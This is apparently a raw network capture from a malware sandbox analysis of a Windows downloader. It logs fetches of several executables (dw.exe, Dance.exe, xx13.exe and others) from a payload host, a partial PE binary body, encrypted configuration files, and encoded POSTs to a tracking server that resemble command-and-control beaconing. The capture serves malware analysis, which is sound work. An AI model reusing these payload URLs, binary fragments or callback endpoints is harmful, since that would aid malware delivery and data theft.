30d.....cv/g6g6pYaOuCPQQIXErWnJfaRcpz68Hg8SZMDO8/slNkc73T1DyVzyULnhIif
eCNlLuaH h1BAz0ydGrFEUTLc7U3 rWTJTPLBGnzPgu9J43zNsK7VqGNs6vbz0uZVj RSM
uvBMfV9QBWwEf9M8p/7xyO0YAA kHXzVdtPZo34oKD9taQcUojPAaMhKwCGVzkxkCt3i1B
KNopL6G1fj8KT5ODZ3Y44HG6pOu 1xAwXLj z/cn6mjf298lKkfgDq9GTOYLwOZe/W90ZR
vtss3h7Vreo3mbZ3WC2m5chVUclN8NiItbbSeNHObiDHPEbJGiFPkaiHi4TTjS6aJlzdL6
fSJp2lHK6kQr4I31w7HwjkGvUSDXb1GuNnTr8p dibrSU3e4yDIhXuAmvfFXsrNWbBmWwH
MKHABwe3fjTSwNXLJQ1LgZ/gLeRPTjxrUIBjqAKUNGQvISJWy z7vYGrcNja7aYJOYuBLZ
zIEJs72wNedz7BU1wv4 EkQLoRtJe8skHHYXoRFe7SOcT3CG7jHkolyksF8b0gz2OE2uFw
EhEasNxzt4kJDlg6XvnaWczRdIxyekSTb/5RIt1LrbdPH7RT Vr6z8RBs4o5Y7EA3JIpSX
gttbb0ftBDu/ivxdIO4sSmF1 JYzWkY6WxahQwf4sbECRmXUf29xPZhAqfNPpi82dkQwnE
xGIEQGrH6Pdf4AIugHMNkUws9PQ y0KHmEPUR1tcFa8iJ5FmdZfmX9lMw0nN7oHEXePgGw
mrPcYu......0..HTTP/1.1 200 OK..Server: nginx/1.10.3 (Ubuntu)..Date: T
hu, 28 Sep 2017 03:12:10 GMT..Content-Type: text/html; charset=UTF-8..
Transfer-Encoding: chunked..Connection: keep-alive..30d.....cv/g6g6pYa
OuCPQQIXErWnJfaRcpz68Hg8SZMDO8/slNkc73T1DyVzyULnhIifeCNlLuaH h1BAz0ydG
rFEUTLc7U3 rWTJTPLBGnzPgu9J43zNsK7VqGNs6vbz0uZVj RSMuvBMfV9QBWwEf9M8p/
7xyO0YAA kHXzVdtPZo34oKD9taQcUojPAaMhKwCGVzkxkCt3i1BKNopL6G1fj8KT5ODZ3
Y44HG6pOu 1xAwXLj z/cn6mjf298lKkfgDq9GTOYLwOZe/W90ZRvtss3h7Vreo3mbZ3WC
2m5chVUclN8NiItbbSeNHObiDHPEbJGiFPkaiHi4TTjS6aJlzdL6fSJp2lHK6kQr4I31w7
HwjkGvUSDXb1GuNnTr8p dibrSU3e4yDIhXuAmvfFXsrNWbBmWwHMKHABwe3fjTSwNXLJQ
1LgZ/gLeRPTjxrUIBjqAKUNGQvISJWy z7vYGrcNja7aYJOYuBLZzIEJs72wNedz7BU1wv
4 EkQLoRtJe8skHHYXoRFe7SOcT3CG7jHkolyksF8b0gz2OE2uFwEhEasNxzt4kJDl

<<< skipped >>>

GET /Series/dracarysfisormek/2/goodchannel/UA.json HTTP/1.1

Host: htagzdownload.pw


HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 28 Sep 2017 03:12:10 GMT
Content-Type: application/json
Content-Length: 40064
Last-Modified: Tue, 26 Sep 2017 11:19:02 GMT
Connection: keep-alive
ETag: "59ca37a6-9c80"
Accept-Ranges: bytes
eeNbj9dtHKieNW5/TNBNDfuLuXIJkX9aQ ppip8O2L0mBlMIxpsHYui/t TGHLJGscSzBe
em4MBqZnEIq5Evoqa69KO/sVV0TBRCMvo6mIPIcYFeIR2OYK0D5D6T95z Evp9mIDg33GR
eAXwqkvwBsj0U4j1M7hr39uDomn12v7PWFXk5isI5VKSxscJPW8Lqcu/64Kf8Vrq6e7 ty
BsEuLrqMyex4pLz69 gX35HQofB8SozFvmN1OQB93JsBBOISU0 n7TyUT/ciA/CpGmYUUz
RUCLTcv5jGOj6kFrmM7gl477nZm/zua6DQi2yln8lpET4u2ZJBuH40tNTgADkG4uhU31E9
VuClTaaddAAmO5doSGh4QqLpjPDsVJEam hGt7KbbiVBXen3PM4SDCW30fgDcJPUKNY9DO
/yGcsYu5Nvdq6jxXN88rugIaABdgaTlxfpO87HjOGvFeFR z0UvzK6FLTsanwTiM5w 3Wf
xqQfm5yYi9CYrqR2ThbyqYq2xlZO bJ9YvMiX0VRUOl6OsTLl3tI0OLYHfcVeShtJ1RzBJ
fuiET4r14ScDvaMMxZ12mtG/kKeAaI6aq3UwOQafluKKGLJ8tP0GfDc7Yji7G3KvliJM2n
klZ Ik2i7aj/dNqZaeu0LYT7BBr45fTfYF91mKTKIn8oczHi0DKNUXpi469POjadRMVZmT
RW5BRZsQmuqSO8MkTwBF6/zvNooLJmn7w4Jq08YePsA5RKOifQKeg/hO50g09gO/qUv3l
V7g75uCyaAbm1ZwxYqgaXIzLrBG2zbXftdLeMOv7rpfCLd1J/sbkm6mZeNa2Z3TZr9xuFh
x7FvbTHDb0hA0q/W kHwqW7mV7p56dTDvb4nLKt5dthRCye63eRMqoUNU0FaNEOlNWzMb/
lmto3BhAHYTBpws4yZqBrGq8rOsMYfE/kXujYOPjdAA0DyAC0rUOiNl42jy/2q9LK lEpY
Ue8miydmEw8NXpxu 0q1YrJ8cTGivSCz7EcwRFfgbtIBsPsYiFuECSu3z/3jx7wFfHnSN6
ZrqLhry/KaerSl5hsHwzu43qjwB9 BTbEqSq4tFGrRkB7lDX1Lykuhx38hEgowG6Da3w8e
IY9NNMiScvk9Rs6NcfdY gj oncjCXxsUtDvG3gLO7/rMbeFWt0bx2 /noXgouH2bJmFP1
yGfl Gl1daJwX4d1IKxltQASQBgA2KW e8tNPhX701al6zA1QEc4biYfzOr4dZec0 Yy4n
mOqKOPB5KlxN0rie0O65Yg/H71KnElROUMayY2jza2L0diVAheLfLp09NSiEV7PgD1y6Ta
4LX8vZ5tKzum0yfzVYm62Sa2kEhKKD9JNalBujXKstu1HGP d4RlPodEis8yUJeGrIepAK
5StqPGnHxy/jd4NMJLAPkTAguNDnsM3rbBnQmGAXaJ08KjnJjVF3B wafZzUtV9gKIgcLZ
ciyY8LArZhHGCnSHWDQBsXHPCtSvT5Vc4qBL3j k40sDaa96dBcZgf0ql3r0zg5MGc

<<< skipped >>>

GET /Series/daenerystargaryen/2/goodchannel.json HTTP/1.1

Host: htagzdownload.pw


HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 28 Sep 2017 03:12:11 GMT
Content-Type: application/json
Content-Length: 344
Last-Modified: Thu, 28 Sep 2017 03:00:01 GMT
Connection: keep-alive
ETag: "59cc65b1-158"
Accept-Ranges: bytes
gNkjKNnXnAo0G6hvTk4U02ja3t2JSvKcwkARMhymcGy7mX8k6cn6yyajvyF58pJ5Lllgsu
vTmX73mAOLk7vORdxMN/QxwFOsue9bWHJA bFoRrNHebH3uNlH2TDR7rGGE7g5gDyMwRUM
Xhzt6GufXumrOs1PKVCkn/x/Ftk/wBu8aQSTxeCZkvk4BEd4NbHtOxYYwdPmnENuV0C7 M
A3ibes8CiL47NWhsxRppWoQtgvBypfmmZClEV3Pi/qM711ekqZiUg12dY0P4zsnOi eYnB
gWz3rIkOz 5Vr8A3Bw2ktNHj9PZaIAi/j4 R3lEyynXy6sSVoKlkuJ EuxfxJA==..


GET /Download/Domain/dw.exe HTTP/1.0
Host: mydownloaddomain.com
User-Agent: InnoTools_Downloader


HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Content-Type: application/x-dosexec
Content-Length: 1611264
Connection: close
Cache-Control: public
Last-Modified: Wed, 27 Sep 2017 13:22:00 GMT
Content-Disposition: attachment; filename="dw.exe"
Accept-Ranges: bytes
Date: Thu, 28 Sep 2017 03:12:04 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...5..Y
................................. ... ....@.. ........................
............@.................................@...K.... ..............
................................................................. ....
........... ..H............text........ ...................... ..`.rsr
c........ ......................@..@.reloc............................
..@..B................p.......H........'..............@...............
.................................0..A....... .&. ....8....r...p(.... .
...8......~..........%..|.o......(....:R...& ....8%.................(.
...8*... ............E....!...........!.......1...8....& ....8.....(..
... ....8....~..... ....8......(,........&.....r...p(.....(....:K...&
.....:....&r5..p(....8*... ............E............................8.
...& ....8....*.........".......... .&..*.. .&..*.> .&. .&..(....*.
.&.~....:....rO..p.....(....o....s.........~....*.* .&.~....*.. .&...
....*: .&.....(....*.> .&......(....*. .&..*.. .&..*.* .&.~....*.&g
t; .&. .&..(....*v .&. .&.s....(....t.........*..: .&.....(....*.>
.&......(....*. .&..*.. .&..*..0.......... .&..(....:....& ....82....:
S...8....& ....8....(....(....84... ............E.....................
...J... ....8.....(....(....%:....(....(...........%...(....& ....(...
.:....8....*.0..?....... .&..(....9M...& ....8.......s......i.......%.
.....i($......(%...(%... ....8_....(.....8....& ....8H...s....%.(!

<<< skipped >>>

GET /pokermatch/podarok200/images/chip-3.png HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: imglands1.gcdn.co
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Sep 2017 03:12:53 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d5e948238bf9ca4a627bff0d0402cf1241499568697; expires=Mon, 09-Jul-18 02:51:37 GMT; path=/; domain=.gamesforluckers.com; HttpOnly
ETag: W/"595f9db6-a559"
Last-Modified: Fri, 07 Jul 2017 14:41:58 GMT
CF-Cache-Status: REVALIDATED
Expires: Mon, 09 Jul 2018 02:51:37 GMT
Cache-Control: public, max-age=31536000
CF-RAY: 37b7fb86f0e58442-KBP
Cache: HIT
X-Cached-Since: 2017-07-09T02:51:37 00:00
X-ID: ix-up-a243
Access-Control-Allow-Origin: *
Cache: HIT
X-Cached-Since: 2017-07-11T07:24:29 00:00
X-ID: m9-up-e242

<<< skipped >>>

GET /?gfe_rd=cr&dcr=0&ei=iWjMWZLmJcLi8AfJxbrgDQ HTTP/1.1
Host: VVV.google.com.ua
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 28 Sep 2017 03:12:09 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=windows-1251
P3P: CP="This is not a P3P policy! See hXXps://VVV.google.com/support/accounts/answer/151657?hl=en for more info."
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: NID=113=mFR7Y1eVLCdwhw4iZKztLv1vnS20DVN4PhRkvTsFQIoU1T2WwPQubZrV4ZprktTqGJ0B6PcfM38uzw_qkShCxx7Ie3FGC3KoIyIAT_lX6F8yKljkTbWffgLA8SYYtX0j; expires=Fri, 30-Mar-2018 03:12:09 GMT; path=/; domain=.google.com.ua; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked

<<< skipped >>>

GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDB+8Myi49ySg== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Thu, 28 Sep 2017 03:12:32 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=121571, public, no-transform, must-revalidate
Last-Modified: Thu, 28 Sep 2017 02:45:22 GMT
Expires: Fri, 29 Sep 2017 14:45:22 GMT
ETag: "192de15b904a49dcdaf0850804284d1c5035d7d7"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Content-Length: 1777
Connection: close
Content-Type: application/ocsp-response

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf/EFWCFiRACEAoBQUIAAAFThXNqC4Xspwg= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: isrg.trustid.ocsp.identrust.com


HTTP/1.1 200 OK
Date: Thu, 28 Sep 2017 02:58:07 GMT
Content-transfer-encoding: Binary
last-modified: Wed, 27 Sep 2017 21:37:18 GMT
ETag: "196936375e8bf9b887f524c99b256c011efed3bd"
expires: Thu, 28 Sep 2017 21:37:18 GMT
cache-control: max-age=43200,public,no-transform,must-revalidate
Content-Type: application/ocsp-response
Content-Length: 1398

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8= HTTP/1.1
Cache-Control: max-age = 511667
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 04:57:34 GMT
If-None-Match: "57ff143e-1d7"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com


HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=172800
Content-Type: application/ocsp-response
Date: Thu, 28 Sep 2017 03:12:58 GMT
Etag: "59cc26af-1d7"
Expires: Sat, 30 Sep 2017 03:12:58 GMT
Last-Modified: Wed, 27 Sep 2017 22:31:11 GMT
Server: ECS (vie/F2D5)
X-Cache: HIT
Content-Length: 471

<<< skipped >>>

POST /temptrack/Store HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: smarttrackk.xyz
Content-Length: 180
Expect: 100-continue
Accept-Encoding: gzip


HTTP/1.1 100 Continue
....



order="VoKGuJd2ELGGMv059EYoxqZWINs70rPNGd2GTkK3r8YEmtLK2bvAB63xputxkC 
/9Gzf6kcMG8qPhOOL/b3llkq8ocwhf708oA2E67 Veoihz9xA0ZhW1/x57DMHj7gv3XVG
qsRtkKsFp8djfLWzo9JGSl7uCgr3JtKjqUyITU="


HTTP/1.1 200 OK
Server: nginx/1.10.1 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Date: Thu, 28 Sep 2017 03:12:08 GMT
Content-Encoding: gzip
14........................0..


GET /gdig2s1-455.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.godaddy.com


HTTP/1.1 200 OK
Date: Thu, 28 Sep 2017 03:12:26 GMT
Server: Apache
Last-Modified: Wed, 27 Sep 2017 03:30:24 GMT
ETag: "ca68-55a2369817400"
Accept-Ranges: bytes
Content-Length: 51816
Cache-Control: max-age=259200
Expires: Sun, 01 Oct 2017 03:12:26 GMT
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Connection: close
Content-Type: application/pkix-crl

<<< skipped >>>

GET / HTTP/1.1
Host: VVV.google.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Location: hXXp://VVV.google.com.ua/?gfe_rd=cr&dcr=0&ei=iWjMWZLmJcLi8AfJxbrgDQ
Content-Length: 272
Date: Thu, 28 Sep 2017 03:12:09 GMT


GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com


HTTP/1.1 200 OK
Date: Wed, 27 Sep 2017 23:18:14 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Last-Modified: Fri, 19 Oct 2012 20:08:11 GMT
Accept-Ranges: bytes
Content-Length: 893
Cache-control: max-age=86400
Content-Type: application/x-pkcs7-mime

<<< skipped >>>

GET /pokermatch/podarok200/images/chip-1.png HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: imglands1.gcdn.co
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Sep 2017 03:12:52 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d0baa994c5496186f1338963226e1fc691499259662; expires=Thu, 05-Jul-18 13:01:02 GMT; path=/; domain=.gamesforluckers.com; HttpOnly
ETag: W/"595ce0dd-a527"
Last-Modified: Wed, 05 Jul 2017 12:51:41 GMT
CF-Cache-Status: MISS
Expires: Thu, 05 Jul 2018 13:01:02 GMT
Cache-Control: public, max-age=31536000
CF-RAY: 379a82bce314824f-KBP
Cache: HIT
X-Cached-Since: 2017-07-05T13:01:02 00:00
X-ID: ix-up-a243
Access-Control-Allow-Origin: *
Cache: HIT
X-Cached-Since: 2017-07-05T14:03:45 00:00
X-ID: m9-up-e243

<<< skipped >>>

GET /HNK45/FTGHUIO6/Dance.exe HTTP/1.1
Host: mydownloaddomain.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Content-Type: application/x-dosexec
Content-Length: 115200
Connection: keep-alive
Cache-Control: public
Last-Modified: Tue, 26 Sep 2017 12:03:53 GMT
Content-Disposition: attachment; filename="Dance.exe"
Accept-Ranges: bytes
Date: Thu, 28 Sep 2017 03:12:09 GMT

<<< skipped >>>

GET /uploads/akil/xx13.exe HTTP/1.1
Host: mydownloaddomain.com


HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Content-Type: application/x-dosexec
Content-Length: 416256
Connection: keep-alive
Cache-Control: public
Last-Modified: Wed, 27 Sep 2017 12:19:00 GMT
Content-Disposition: attachment; filename="xx13.exe"
Accept-Ranges: bytes
Date: Thu, 28 Sep 2017 03:12:09 GMT

<<< skipped >>>

GET /uploads/akil/xx12.exe HTTP/1.1
Host: mydownloaddomain.com


HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Content-Type: application/x-dosexec
Content-Length: 567808
Connection: keep-alive
Cache-Control: public
Last-Modified: Wed, 27 Sep 2017 12:08:16 GMT
Content-Disposition: attachment; filename="xx12.exe"
Accept-Ranges: bytes
Date: Thu, 28 Sep 2017 03:12:10 GMT

<<< skipped >>>

GET /uploads/EmreExe/Recover.exe HTTP/1.1
Host: mydownloaddomain.com


HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Content-Type: application/x-dosexec
Content-Length: 250880
Connection: keep-alive
Cache-Control: public
Last-Modified: Wed, 27 Sep 2017 12:21:34 GMT
Content-Disposition: attachment; filename="Recover.exe"
Accept-Ranges: bytes
Date: Thu, 28 Sep 2017 03:12:10 GMT

<<< skipped >>>

GET /HNK45/FTGHUIO6/Twerk.exe HTTP/1.1
Host: mydownloaddomain.com


HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Content-Type: application/x-dosexec
Content-Length: 121344
Connection: keep-alive
Cache-Control: public
Last-Modified: Sat, 23 Sep 2017 00:37:18 GMT
Content-Disposition: attachment; filename="Twerk.exe"
Accept-Ranges: bytes
Date: Thu, 28 Sep 2017 03:12:11 GMT

<<< skipped >>>

GET //MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Thu, 28 Sep 2017 03:12:35 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120194, public, no-transform, must-revalidate
Last-Modified: Thu, 28 Sep 2017 02:21:16 GMT
Expires: Fri, 29 Sep 2017 14:21:16 GMT
ETag: "c9d119809ad2c096216a3327e7898a1ae4fbbe38"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Content-Length: 1730
Connection: close
Content-Type: application/ocsp-response

<<< skipped >>>

POST /temptrack/Store HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: smarttrackk.xyz
Content-Length: 180
Expect: 100-continue
Accept-Encoding: gzip
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



order="VoKGuJd2ELGGMv059EYoxqZWINs70rPNGd2GTkK3r8YEmtLK2bvAB63xputxkC 
/9Gzf6kcMG8qPhOOL/b3llr2BVFPXaKb8cCgw L8rEc0UflKSlwp8RJgB6 iYCfyyHVZEW
xBWuj3I6/4ocJaJxBSkaX8GS7GwUZgj/U1xsN0="


HTTP/1.1 200 OK
Server: nginx/1.10.1 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Date: Thu, 28 Sep 2017 03:12:05 GMT
Content-Encoding: gzip
14........................0..


GET /pokermatch/podarok200/images/logo-pokermatch.png HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: imglands1.gcdn.co
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Sep 2017 03:12:52 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=db5a0851b0ca3d4d4424694ecd363cf211499922480; expires=Fri, 13-Jul-18 05:08:00 GMT; path=/; domain=.gamesforluckers.com; HttpOnly
ETag: W/"596646b3-216e"
Last-Modified: Wed, 12 Jul 2017 15:56:35 GMT
CF-Cache-Status: REVALIDATED
Expires: Fri, 13 Jul 2018 05:08:00 GMT
Cache-Control: public, max-age=31536000
CF-RAY: 37d9b8cf266d825b-KBP
Cache: HIT
X-Cached-Since: 2017-07-13T05:08:00 00:00
X-ID: ix-up-a243
Access-Control-Allow-Origin: *
Cache: HIT
X-Cached-Since: 2017-07-13T13:12:06 00:00
X-ID: m9-up-e245

<<< skipped >>>

GET /pokermatch/podarok200/images/f-icon-4.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: imglands1.gcdn.co
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Sep 2017 03:12:53 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dec15e6cee66e6103cf4fa0e28b7212121499922480; expires=Fri, 13-Jul-18 05:08:00 GMT; path=/; domain=.gamesforluckers.com; HttpOnly
ETag: W/"596646b3-1306"
Last-Modified: Wed, 12 Jul 2017 15:56:35 GMT
CF-Cache-Status: EXPIRED
Expires: Fri, 13 Jul 2018 05:08:00 GMT
Cache-Control: public, max-age=31536000
CF-RAY: 37d9b8d0c0b38406-KBP
Cache: HIT
X-Cached-Since: 2017-07-13T05:08:00+00:00
X-ID: ix-up-a243
Access-Control-Allow-Origin: *
Cache: HIT
X-Cached-Since: 2017-07-13T13:12:06+00:00
X-ID: m9-up-e245
[PNG image data, one 0x1306-byte chunk: Adobe Photoshop CC 2017 (Macintosh) export with embedded XMP metadata; binary body omitted]

<<< skipped >>>

GET /pokermatch/podarok200/images/f-icon-5.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: imglands1.gcdn.co
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Sep 2017 03:12:53 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da2d33e1487b0d2e2cd36dd4eb22923d41499922480; expires=Fri, 13-Jul-18 05:08:00 GMT; path=/; domain=.gamesforluckers.com; HttpOnly
ETag: W/"596646b3-602"
Last-Modified: Wed, 12 Jul 2017 15:56:35 GMT
CF-Cache-Status: EXPIRED
Expires: Fri, 13 Jul 2018 05:08:00 GMT
Cache-Control: public, max-age=31536000
CF-RAY: 37d9b8d102518243-KBP
Cache: HIT
X-Cached-Since: 2017-07-13T05:08:00+00:00
X-ID: ix-up-a243
Access-Control-Allow-Origin: *
Cache: HIT
X-Cached-Since: 2017-07-13T13:12:04+00:00
X-ID: m9-up-e245
[PNG image data, one 0x602-byte chunk: Adobe Photoshop CC 2017 (Macintosh) export with embedded XMP metadata; binary body omitted]

<<< skipped >>>

GET /pokermatch/podarok200/images/f-icon-6.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: imglands1.gcdn.co
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Sep 2017 03:12:53 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d5ceb5ab74d0727715778c9259e9d5f3d1499922480; expires=Fri, 13-Jul-18 05:08:00 GMT; path=/; domain=.gamesforluckers.com; HttpOnly
ETag: W/"596646b3-bc2"
Last-Modified: Wed, 12 Jul 2017 15:56:35 GMT
CF-Cache-Status: EXPIRED
Expires: Fri, 13 Jul 2018 05:08:00 GMT
Cache-Control: public, max-age=31536000
CF-RAY: 37d9b8d112e383f4-KBP
Cache: HIT
X-Cached-Since: 2017-07-13T05:08:00+00:00
X-ID: ix-up-a243
Access-Control-Allow-Origin: *
Cache: HIT
X-Cached-Since: 2017-07-13T13:12:06+00:00
X-ID: m9-up-e245
[PNG image data, one 0xbc2-byte chunk: Adobe Photoshop CC 2017 (Macintosh) export with embedded XMP metadata; binary body omitted]

<<< skipped >>>

GET /pokermatch/podarok200/images/app-windows.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: imglands1.gcdn.co
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Sep 2017 03:12:53 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d3954bf174f3a0fccb73ef2ce803e81571499922481; expires=Fri, 13-Jul-18 05:08:01 GMT; path=/; domain=.gamesforluckers.com; HttpOnly
ETag: W/"596646b3-2088"
Last-Modified: Wed, 12 Jul 2017 15:56:35 GMT
CF-Cache-Status: EXPIRED
Expires: Fri, 13 Jul 2018 05:08:01 GMT
Cache-Control: public, max-age=31536000
CF-RAY: 37d9b8d6b5098219-KBP
Cache: HIT
X-Cached-Since: 2017-07-13T05:08:01+00:00
X-ID: ix-up-a243
Access-Control-Allow-Origin: *
Cache: HIT
X-Cached-Since: 2017-07-13T13:12:06+00:00
X-ID: m9-up-e245
[PNG image data, one 0x2088-byte chunk: Adobe Photoshop CC 2015 (Windows) export with embedded XMP metadata; binary body omitted]

<<< skipped >>>

GET /pokermatch/podarok200/images/app-ios.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: imglands1.gcdn.co
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Sep 2017 03:12:53 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d61eea1933a751583ac6a3ad0b29ede021499922482; expires=Fri, 13-Jul-18 05:08:02 GMT; path=/; domain=.gamesforluckers.com; HttpOnly
ETag: W/"596646b3-21b3"
Last-Modified: Wed, 12 Jul 2017 15:56:35 GMT
CF-Cache-Status: EXPIRED
Expires: Fri, 13 Jul 2018 05:08:02 GMT
Cache-Control: public, max-age=31536000
CF-RAY: 37d9b8d9a5828219-KBP
Cache: HIT
X-Cached-Since: 2017-07-13T05:08:02+00:00
X-ID: ix-up-a243
Access-Control-Allow-Origin: *
Cache: HIT
X-Cached-Since: 2017-07-13T13:12:04+00:00
X-ID: m9-up-e245
[PNG image data, one 0x21b3-byte chunk: Adobe Photoshop CC 2015 (Windows) export with embedded XMP metadata; binary body omitted]

<<< skipped >>>

GET /pokermatch/podarok200/images/f-icon-1.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: imglands1.gcdn.co
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Sep 2017 03:12:53 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d5ceb5ab74d0727715778c9259e9d5f3d1499922480; expires=Fri, 13-Jul-18 05:08:00 GMT; path=/; domain=.gamesforluckers.com; HttpOnly
ETag: W/"596646b3-1cb5"
Last-Modified: Wed, 12 Jul 2017 15:56:35 GMT
CF-Cache-Status: EXPIRED
